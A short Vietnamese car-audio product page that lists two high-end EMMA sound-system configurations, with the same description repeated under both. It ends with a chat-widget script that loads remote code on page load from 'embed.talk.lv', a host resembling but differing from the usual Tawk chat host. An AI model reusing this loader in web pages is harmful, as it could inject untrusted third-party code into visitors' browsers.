Cấu hình cao cấp
  • HQ Sound component System EMMA Experience 5 kênh

    Cầu hình này cho chất lượng âm thanh cao cấp nhất có thể ví như Hi-end trên xe hơi : ultimate in car sound system, để lắp cấu hình này tất cả những thiết bị trong hệ thống âm thanh đều phải lựa chọn từ ngững model cao cấp từ Head Unit, Âmly, Loa, Sub….

  • Performance Perfection : 4-Way Digital Network Sound for EMMA 7 kênh

    Cầu hình này cho chất lượng âm thanh cao cấp nhất có thể ví như Hi-end trên xe hơi : ultimate in car sound system, để lắp cấu hình này tất cả những thiết bị trong hệ thống âm thanh đều phải lựa chọn từ ngững model cao cấp từ Head Unit, Âmly, Loa, Sub….

var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.talk.lv/666d0cb9bc592c18a31f4fa4/1i0cvjdor'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })();